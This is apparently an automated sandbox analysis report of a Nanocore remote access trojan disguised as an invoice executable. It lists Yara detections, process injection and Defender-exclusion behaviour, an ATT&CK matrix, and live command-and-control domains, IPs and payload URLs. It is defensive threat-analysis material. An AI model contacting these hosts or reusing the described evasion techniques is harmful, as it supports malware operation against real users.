        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exeCode function: 3_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: svchost.exe, 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: CasPol.exe, 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: CasPol.exe, 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4228, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4184, type: MEMORY
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3ff84.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c4629.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.51c0000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b445ad.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.CasPol.exe.3b3b14e.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.458a9c0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44b40f0.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a65720.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.svchost.exe.45bd7e0.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.svchost.exe.6a98540.11.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.44812d0.6.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture11File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsCommand and Scripting Interpreter1Windows Service1Application Shimming1Deobfuscate/Decode Files or Information11LSASS MemorySystem Information Discovery13Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsService Execution2Registry Run Keys / Startup Folder11Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerSecurity Software Discovery321SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Windows Service1Software Packing11NTDSVirtualization/Sandbox Evasion14Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptProcess Injection312Timestomp1LSA SecretsProcess Discovery3SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRegistry Run Keys / Startup Folder11Masquerading221Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol2Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion14DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection312/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 358392 Sample: CN-Invoice-XXXXX9808-190111... Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 58 nanopc.linkpc.net 2->58 72 Multi AV Scanner detection for domain / URL 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Multi AV Scanner detection for submitted file 2->76 78 11 other signatures 2->78 8 CN-Invoice-XXXXX9808-19011143287994.exe 23 9 2->8         started        13 explorer.exe 2->13         started        15 explorer.exe 2->15         started        17 3 other processes 2->17 signatures3 process4 dnsIp5 68 coroloboxorozor.com 172.67.172.17, 49722, 49728, 49731 CLOUDFLARENETUS United States 8->68 52 C:\Windows\Microsoft.NET\...\svchost.exe, PE32 8->52 dropped 54 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 8->54 dropped 56 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 8->56 dropped 80 Creates an autostart registry key pointing to binary in C:\Windows 8->80 82 Writes to foreign memory regions 8->82 84 Adds a directory exclusion to Windows Defender 8->84 88 4 other signatures 8->88 19 CasPol.exe 8->19         started        23 cmd.exe 8->23         started        25 powershell.exe 26 8->25         started        34 3 other processes 8->34 70 192.168.2.1 unknown unknown 13->70 27 svchost.exe 13->27         started        86 Drops executables to the windows directory (C:\Windows) and starts them 15->86 30 svchost.exe 15->30         started        32 WerFault.exe 17->32         started        file6 signatures7 process8 dnsIp9 60 nanopc.linkpc.net 157.97.120.21, 50005 UNISCAPEBIT-ServicesHostingNL Netherlands 19->60 62 185.157.161.86, 50005 OBE-EUROPEObenetworkEuropeSE Sweden 19->62 46 C:\Users\user\AppData\Roaming\...\run.dat, data 19->46 dropped 36 conhost.exe 23->36         started        38 timeout.exe 23->38         started        40 conhost.exe 25->40         started        64 coroloboxorozor.com 27->64 48 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 27->48 dropped 90 Multi AV Scanner detection for dropped file 27->90 92 Machine Learning detection for dropped file 27->92 94 Adds a directory exclusion to Windows Defender 27->94 66 coroloboxorozor.com 30->66 50 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 30->50 dropped 96 System process connects to network (likely due to code injection or exploit) 30->96 42 AdvancedRun.exe 34->42         started        44 conhost.exe 34->44         started        file10 signatures11 process12

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        CN-Invoice-XXXXX9808-19011143287994.exe30%VirustotalBrowse
        CN-Invoice-XXXXX9808-19011143287994.exe28%ReversingLabsByteCode-MSIL.Trojan.Generic
        CN-Invoice-XXXXX9808-19011143287994.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe3%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\5013165c-d39a-4f57-8b45-9c3615d2afd1\AdvancedRun.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe3%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe3%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\e33cd0bd-fe57-408e-abef-c8ddfa8d2134\AdvancedRun.exe0%ReversingLabs
        C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe28%ReversingLabsByteCode-MSIL.Trojan.Generic

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        13.2.CasPol.exe.51c0000.7.unpack100%AviraTR/NanoCore.fadteDownload File
        13.2.CasPol.exe.400000.0.unpack100%AviraHEUR/AGEN.1108376Download File

        Domains

        SourceDetectionScannerLabelLink
        coroloboxorozor.com15%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://coroloboxorozor.com/base/7A885C86AF3E7CAEF5D9FC154830C30E.html0%Avira URL Cloudsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
        http://coroloboxorozor.com0%Avira URL Cloudsafe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
        https://go.microd:0%Avira URL Cloudsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
        https://sectigo.com/CPS0C0%URL Reputationsafe
        https://sectigo.com/CPS0C0%URL Reputationsafe
        https://sectigo.com/CPS0C0%URL Reputationsafe
        https://sectigo.com/CPS0D0%URL Reputationsafe
        https://sectigo.com/CPS0D0%URL Reputationsafe
        https://sectigo.com/CPS0D0%URL Reputationsafe
        http://coroloboxorozor.com/base/F5B9A7CB87ADE6C09DC3687F02604706.html0%Avira URL Cloudsafe
        http://coroloboxorozor.com/base/88756E9935B1A5EAEE811D9BDFD69574.html0%Avira URL Cloudsafe
        http://crl.micr0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        nanopc.linkpc.net
        		157.97.120.21
        		truefalse
          		high
          coroloboxorozor.com
          		172.67.172.17
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://coroloboxorozor.com/base/7A885C86AF3E7CAEF5D9FC154830C30E.htmltrue
          • Avira URL Cloud: safe
          		unknown
          http://coroloboxorozor.com/base/F5B9A7CB87ADE6C09DC3687F02604706.htmltrue
          • Avira URL Cloud: safe
          		unknown
          http://coroloboxorozor.com/base/88756E9935B1A5EAEE811D9BDFD69574.htmltrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
            		high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
              		high
              http://ocsp.sectigo.com0CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.940071314.000000000501F000.00000004.00000001.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                  		high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000003.754942808.0000000009871000.00000004.00000001.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                        		high
                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0sCN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 00000011.00000003.754350493.0000000004DB0000.00000004.00000001.sdmpfalse
                          		high
                          http://coroloboxorozor.comCN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.857832068.0000000002EE1000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.935499010.00000000031E1000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.934160270.0000000002921000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
